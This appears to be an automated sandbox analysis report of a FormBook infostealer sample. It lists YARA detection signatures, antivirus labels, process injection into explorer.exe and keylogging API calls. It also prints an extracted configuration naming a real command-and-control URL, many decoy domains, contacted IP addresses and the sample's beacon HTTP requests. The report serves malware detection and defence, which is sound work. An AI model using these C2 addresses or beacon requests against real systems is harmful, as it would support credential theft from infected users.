1.2.kmhbvf.exe.3b00000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.kmhbvf.exe.3b00000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.kmhbvf.exe.3b00000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.kmhbvf.exe.3b00000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.kmhbvf.exe.3b00000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.kmhbvf.exe.3b00000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.kmhbvf.exe.3b00000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.kmhbvf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.kmhbvf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.kmhbvf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.kmhbvf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
2.2.kmhbvf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.kmhbvf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.kmhbvf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.kmhbvf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Joe Sandbox ML: detected

Source: 2.0.kmhbvf.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.kmhbvf.exe.3b00000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.kmhbvf.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.justbeand.com/sk19/"], "decoy": ["21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com", "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online", "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk", "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk", "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo", "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com", "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com", "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz", "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com", "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz", "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun", "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club", "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com", "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com", "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com", "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"]}

Source: shedfam.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00402654 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD14 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 4x nop then pop esi

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 18.167.242.213 80
Source: C:\Windows\explorer.exe	Network Connect: 103.100.63.146 80
Source: C:\Windows\explorer.exe	Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe	Domain query: www.73129.vip

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.111lll.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.justbeand.com/sk19/

Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: YISUCLOUDLTD-AS-APYISUCLOUDLTDHK YISUCLOUDLTD-AS-APYISUCLOUDLTDHK

Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://gcsahrz23.xyz/
Source: shedfam.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: shedfam.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: kmhbvf.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown

DNS traffic detected: queries for: www.111lll.xyz

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 14:13:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: Cheertech CDNX-Cache-Status: MISSData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

